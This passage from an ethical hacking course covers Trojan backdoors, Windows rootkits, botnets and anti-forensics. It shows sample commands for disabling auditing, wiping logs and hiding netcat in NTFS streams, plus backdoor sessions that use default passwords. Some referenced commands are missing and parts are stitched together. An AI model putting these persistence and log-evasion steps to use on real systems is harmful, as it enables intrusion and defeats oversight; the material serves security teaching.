server (hole) will bind to port 1337, use the password ―ratehole!‖ for client validation,
and run under the fake process name ―bash‖. After authentication, the user will be
dropped into a Bourne shell and the files /tmp/.pipe0 and /tmp/.pipe1 will be used for
encrypting the traffic. Let‘s begin by examining running processes before and after the
server is started.
[schism]# ./hole
root@schism:~/rathole-1.2# ps aux |grep bash
root 4072 0.0 0.3 4176 1812 tty1 S+ 14:41 0:00 –bash
root 4088 0.0 0.3 4168 1840 pts/0 Rs 14:42 0:0 –bash
root 4192 0.0 0.0 720 52 ? Ss 15:11 0:00 bash
[apogee]$ ./rat
Usage: rat <ip> <port>
[apogee]$ ./rat 192.168.1.103 1337
Password:
#
The number of potential Trojan techniques is limited only by the attacker‘s imagination
(which tends to be expansive). For example, back doors can use reverse shell, port
knocking, and covert channel techniques to maintain a remote connection to the
compromised host. Vigilant monitoring and inventorying of all your listening ports will
prevent this type of attack, but your best countermeasure is to prevent binary
modification in the first place.
Attackers are always looking for new ways to access information. They will ensure that
they know the perimeter and the people on the perimeter - security guards, receptionists
and help desk workers - to exploit human oversight. People have been conditioned not
to be overtly suspicious that, they associate certain behavior and appearance to known
entities. For instance, on seeing a man dressed in brown and stacking a whole bunch of
boxes in a cart, people will hold the door open because they think it is the delivery man.
Some companies list employees by title and give their phone number and email address
on the corporate Web site. Alternatively, a corporation may put advertisements in the
paper for high-tech workers who trained on Oracle databases or UNIX servers. These
little bits of information help Attackers know what kind of system they're tackling. This
overlaps with the reconnaissance phase.
Summary:
Thus the Unit provides an in-depth Coverage on Pre- attack Phases and the techniques
to Gain and maintaining the access on a target network and the skill level of the
perpetrator and the initial level of access. As the Unit covers the Pre- attack phases,
Scanning methodology is deeply covered in which different types of scanning
techniques are covered in Windows and Linux Environment. This is one of the important
phases in Ethical Hacking where the Attacker will gain in-depth knowledge about the
targets. After explaining the scanning techniques clearly the unit takes the learner to a
next level of Ethical hacking in which the procedure for interpreting the scanned result is
discussed in detail therefore the learner can have a deep understanding on the different
types of services running on the target. Then the unit focuses on the procedure to gain
access on the target using different kinds of attacking methods that involves Privilege
escalation and Password cracking on the target system. It also provides the learner an
in-depth knowledge on DNS attacks and various other attacks that can be committed in
a promiscuous mode within a network. Conclusively, it covers the Social Engineering
and Trojan attacks.
Reference:
Banner Grabbing and Scanning: http://www.youtube.com/watch?v=dPQRO3mIohw
1. What is Ping?
3. What are the step by step procedures to detect the Operating System in a target?
4. What is a Telnet?
Objective:
The Objective of this Unit is to explain the maintenance of access gained through
hacking and the techniques used to avoid the traces of attacks in order to escape from
the legal Punishment by a malicious hacker.
Introduction:
The Unit Primarily Covers the techniques used to maintain the access that was gained
from the previous phases of attacks thereby it allows the attacker to come back to the
target networks again and again. The Unit also focuses on the techniques that were
commonly used to cover up the evidence in order to evade Forensics investigation and
to escape from the legal punishment.
1. Maintaining access
Once a hacker gains access to the target , the attacker can choose to both use the
system and its resources and further use the system as a launch pad to scan and
exploit other systems, or keep a low profile and continue exploiting the system. Both
these actions have damaging consequences to the organization. For instance he can
implement a sniffer to capture all the network traffic, including telnet and ftp sessions to
other systems.
Attackers choosing to remain undetected remove evidence of their entry and use a
backdoor or a Trojan to gain repeat access. They can also install Rootkits at the kernel
level to gain super user controls. The reason behind this is that Rootkits gain access at
the operating system level while Trojan horse gain access at the application level and
depend on users to a certain extent to get installed. Within Windows systems most
Trojans install themselves as a service and run as Local System which is above
administrator.
Hackers can use Trojan horses to transfer user names, passwords, even credit card
information stored on the system. They can maintain control over 'their' system for long
time periods by 'hardening' the system against other hackers and sometimes in the
process do render some degree of protection to the system from other attacks. They
can then use their access to steal data, consume CPU cycles, trade sensitive
information or even resort to extortion.
Although the term was originally coined on the UNIX platform (―root‖ being the super user
account there), the world of Windows root kits has undergone a renaissance period in the
last few years. Interest in Windows root kits was originally driven primarily by Greg Hoglund,
who produced one of the first utilities officially described as an ―NT root kit‖ circa 1999
(although many others had been ―rooting‖ and pilfering Windows systems long before then
using custom tools and assemblies of public programs, of course). Hoglund‘s original NT
Root kit was essentially a proof-of-concept platform for illustrating the concept of altering
protected system programs in memory (―patching the kernel‖ in geek-speak) to completely
eradicate the trustworthiness of the operating system.
Microsoft and many other operating system vendors use only two out of the four
privilege levels (called rings) provided by standard Intel hardware. This sets up a single
barrier between no privileged user mode activity in Ring 3, and highly privileged kernel
mode functions in Ring 0 (again, Rings 1 and 2 are not used). Thus, any mechanism
that can penetrate the veil between user mode and kernel mode can attain unlimited
access to the system.
Jamie‘s presentation goes on to describe a more direct mechanism for attaining control
of kernel memory, via kernel-mode device drivers (or loadable kernel modules, LKMs,
on non-Windows systems). This is how most modern Rootkits work today.
Thus, Rootkits are composed of two basic pieces: a dropper and a payload. The
dropper is anything that can get the target system to execute code, be it security
vulnerability or tricking a user into opening an e-mail attachment. The payload is
typically a kernel-hooking routine or a kernel-mode device driver that performs one or
more of the following techniques to hide its presence and perform its nefarious
activities:
This is traditionally done either by usurping kernel access calls or more recently by
loading a malicious device driver (.sys), which is itself then hidden. Once the kernel is
compromised, standard API calls that could be used to identify hidden files, ports,
processes, and so on can be usurped to give false information. Good luck trying to find
a rootkit when you can‘t even trust the dir or netstat commands! The subsequent
techniques mostly rely on this important first step.
Because processes are necessary to do work on Windows, a good rootkit must find a
way to hide them. Most commonly, Rootkits hide a process by delinking it from the
active process list, which prevents common APIs from seeing it. Many Rootkits also
create threads, which are subcomponents of a process. By creating threads ―hidden‖
within processes, it becomes more difficult for users to identify running programs.
To hide the backdoor component that allows remote control via a network, Rootkits
commonly attempt to hide the network ports on which they listen, whether they be TCP
or UDP. The popular rootkit ―kit‖ Hacker Defender hooks every process on the system
and thus can avoid easy identification using investigative techniques such as net stat.
Hacker Defender uses a 256-bit key to authenticate commands to these ports. Other
rootkits, including cd00r and SAdoor, adopt techniques such as port knocking
(http://www.portknocking.org) to achieve a similar capability.
The primary technique utilized by Hacker Defender is to use the Windows API functions
WriteProcessMemory and CreateRemoteThread to create a new thread within all
running processes. The function of this thread is to alter the Windows kernel
(kernel32.dll) by patching it in memory to rewrite information returned by API calls to
hide hxdef‘s presence. hxdef also installs hidden back doors, registers as a hidden
system service, and installs a hidden system driver, probably to provide redundant
reinfection vectors if one or more are discovered.
hxdef‘s popularity probably relates to its ease of use combined with powerful
functionality (ironically similar to its host system, Windows). Its INI file is easy to
understand, and it binds to every listening port to listen for incoming commands, as we
noted earlier in our discussion of port hiding. You have to use the hxdef backdoor client
to connect to the backdoored port, as shown next:
Host: localhost
Port: 80
Pass: hxdef-rules
connecting server ...
receiving banner ...
opening backdoor ..
backdoor found
checking backdoor ......
backdoor ready
authorization sent, waiting for reply
authorization – SUCCESSFUL
backdoor activated!
C:\WINNT\system32>
Note that we‘ve used the default password to connect to the backdoor thread on port
80, which is commonly used to host a web server (and thus passes through standard
firewall configurations).
Like hxdef, FU consists of two components: a user-mode dropper (fu.exe) and a kernel-
mode driver (msdirectx.sys). The dropper is a console application that allows certain
parameters of the rootkit to be modified by the attacker. The driver performs the
standard unlinking of the attacker-defined process from the standard process list to hide
it from users. Again, once installed in the kernel, it‘s curtains for the victim system.
Vanquish is a DLL injection-based Romanian rootkit that hides files, folders, and
Registry entries and logs passwords. It is composed of the files vanquish.exe and
vanquish.dll. It first gained notoriety circa NT4 with the getadmin exploit. DLL injection is
similar to hooking kernel-mode API calls, except that it injects malicious code into a
privileged kernel-mode process to achieve the same ends. Microsoft has sought to limit
its exposure to DLL injection, for example by causing the operating system to shut down
when the integrity of privileged processes is violated by DLL injection attempts.
The AFX Rootkit attempts to simplify rootkit deployment. AFX is composed of two files,
iexplore.dll and explorer.dll, which it names iexplore.exe and explorer.exe and copies to
the system folder. Anything executed from its root folder will be hidden in several
dynamic ways. Shifting the techniques used to hide components makes AFX more
difficult to detect by tools that detect only one or two hiding techniques. AFX is also
interesting for its easy-to-use graphical user interface for generating customized
Rootkits.
Although we prefer the term ―drone‖ or ―agent,‖ bot is derived from ―robot‖ and has
traditionally referred to a program that performs predefined actions in an automated
fashion on unmonitored Internet Relay Chat (IRC) channels. The connection with IRC is
important, because the primary mechanism for controlling most malicious bots today is
IRC. Zombie simply refers to a machine that has been infected with a bot.
What would anyone want to do with an army of PCs hooked up to the Internet? To
leverage the potentially massive power of thousands of computers harnessed together,
of course. Typically, abuse falls into the following categories:
Spam: Ongoing efforts have closed down most of the unsecured e-mail relays on
the Internet today, but this seems not to have dented the massive volume of
spam fl owing into inboxes worldwide. Ever wonder why? Spammers are buying
access to zombies who run e-mail gateways. Even better, this sort of distributed
spamming is more difficult to block by mail servers that key on high volumes of
mail from a single source—with zombies, you dribble out a low volume of mail
from thousands of sources.
5. Disabling Auditing
If the target system owner is halfway security savvy, they will have enabled auditing, as
we explained early in this chapter. Because it can slow down performance on active
servers, especially if success of certain functions such as User & Group Management is
audited, most Windows admins either don‘t enable auditing or enable only a few
checks. Nevertheless, the first thing intruders will check on gaining Administrator
privilege is the status of Audit policy on the target, in the rare instance that activities
performed while pilfering the system are watched. Resource Kit‘s auditpol tool makes
this a snap. The next example shows auditpol run with the disable argument to turn off
the auditing on a remote system (output abbreviated):
C:\> auditpol /disable
Running ...
Local audit information changed successfully ...
New local audit policy ...
(0) Audit Disabled
AuditCategorySystem = No
AuditCategoryLogon = Failure
AuditCategoryObjectAccess = No
At the end of their stay, the intruders will just turn on auditing again using the
auditpol/enable switch, and no one will be the wiser. Individual audit settings are
preserved by auditpol.
Some of the features logclean-ng supports include (use –h and –H options for complete
list):
wtmp, utmp, lastlog, samba, syslog, accounting prelude, and snort support
Generic text file modification
Interactive mode
Program logging and encryption capabilities
Manual file editing
Complete log wiping for all files
Timestamp modification
Of course, the first step in removing the record of their activity is to alter the login logs.
To discover the appropriate technique for this requires a peek into the /etc/syslog .conf
configuration file. For example, in the syslog.conf file shown next, we know that the
majority of the system logins can be found in the /var/log directory
With this knowledge, the attackers know to look in the /var/log directory for key log files.
With a simple listing of that directory, we find all kinds of log files, including cron,
maillog, messages, spooler, auth, wtmp, and xferlog.
A number of files will need to be altered, including messages, secure, wtmp, and
xferlog. Because the wtmp log is in binary format (and typically used only for the who
command), the attackers will often use a rootkit program to alter this file. Wzap is
specific to the wtmp log and will clear out the specified user from the wtmp log only. For
example, to run logclean-ng, perform the following:
The new output log (wtmp.out) has the user ―w00t‖ removed. Files such as secure,
messages, and xferlog log files can all be updated using the log cleaner find and
remove (or replace) capabilities.
One of the last steps will be to remove their own commands. Many UNIX shells keep a
history of the commands run to provide easy retrieval and repetition. For example, the
Bourne Again shell (/bin/bash) keeps a file in the user‘s directory (including root‘s in
many cases) called .bash_history that maintains a list of the recently used commands.
Usually as the last step before signing off, attackers will want to remove their entries.
For example, the .bash history file may look something like this:
Using a simple text editor, the attackers will remove these entries and use the touch
command to reset the last accessed date and time on the file. Usually attackers will not
generate history files because they disable the history feature of the shell by setting.
Additionally, an intruder may link .bash_history to /dev/null:
The approaches illustrated above will aide in covering a hacker‘s tracks provided two
conditions are met:
Now that we have compiled the log cleaner and created our list, let‘s run the program.
The program will attach to the process ID of syslogd and stop any entries from being
logged when they are matched to any value in our list:
If we grep through the auth logs on the system, you will see no entry has been created
for this recent connection. The same will hold true if syslog forwarding is enabled:
We should note that the debug option was enabled at compile-time to allow you to see
the entries as they are intercepted and discarded; however, a hacker would want the log
cleaner to be as stealthy as possible and would not output any information to the
console or anywhere else. The malicious user would also use a kernel level rootkit to
hide all files and processes relating to the log cleaner. We will discuss kernel rootkits in
detail in the next section.
8. Hiding Files
Keeping a toolkit on the target system for later use is a great timesaver for malicious
hackers. However, these little utility collections can also be calling cards that alert wary
system admins to the presence of an intruder. Therefore, steps will be taken to hide the
various files necessary to launch the next attack. attrib Hiding files gets no simpler than
copying files to a directory and using the old DOS attrib tool to hide it, as shown with the
following syntax:
attrib +h [directory]
This hides files and directories from command-line tools, but not if the Show All Files
option is selected in Windows Explorer.
To stream files, an attacker will need the POSIX utility cp from Resource Kit. The syntax
is simple, using a colon in the destination file to specify the stream:
Here‘s an example:
This hides nc.exe in the nc.exe stream of oso001.009. Here‘s how to unstream netcat:
The modification date on oso001.009 changes but not its size. (Some versions of cp
may not alter the file date.) Therefore, hidden streamed files are very hard to detect.
Deleting a streamed file involves copying the ―front‖ file to a FAT partition and then
copying it back to NTFS. Streamed files can still be executed while hiding behind their
front. Due to cmd.exe limitations, streamed files cannot be executed directly (that is,
oso001.009:nc.exe). Instead, try using the start command to execute the file:
Start oso001.009:nc.exe
An attacker would like to remove evidence of his presence and activities for various
reasons including maintaining access, evading criminal punishment etc. This normally
done by removing any evidence from the logs files and replacing system binaries with
Trojans, such as Netstat, so that the system administrator cannot detect the intruder on
the attacked system. Once the Trojans are in place, the attacker can be assumed to
have gained total control of the system. Just as there are automated scripts for hacking,
there are also automated tools for hiding intruders, often called Root kits. By executing
the script, a variety of critical files are replaced, hiding the attacker in seconds.
Steganography and Tunneling. Other techniques include Steganography, Tunneling
etc. Steganography is the process of hiding data - for instance in images and sound
files. Tunneling takes advantage of the transmission protocol by carrying one protocol
over another. Even the extra space in the TCP and IP headers can be used for hiding
information. An attacker can use the system as a cover to launch fresh attacks against
other systems or use it as a means to reach another system on the network undetected.
Thus this phase of attack can turn into a new cycle of attack by using reconnaissance
techniques all over again. There have been instances where the attacker has lurked on
the systems even as systems administrators have changed. The system administration
can deploy host based IDS and antivirus tools that can detect Trojans and other
seemingly benign files and directories.
As an ethical hacker you must have be aware of the tools and techniques that
are deployed by attackers so that you are able to advocate and take countermeasures
to ensure protection. These will be learned in this course.
Summary:
The Unit covered the Maintenance phase of Hacking and the techniques and tools used
by hackers to maintain the Access. The Unit clearly explained the way through which
the Backdoors are created by the attacker to maintain the access. It focused well on the
concept of keystrokes and how can it impact the Organizational IT assets. The Unit
gave a detailed coverage on the function of Bots and Zombies used by the attacker to
damage the IT infrastructure. Conclusively, the Unit also explained how the attackers
use methodology to cover all tracks in networks escape from the legal actions.
Reference:
Maintaining the Access through Metasploit: http://www.youtube.com/watch?v=TmkW6JyoRns
Glossary:
2. What is a rootkit?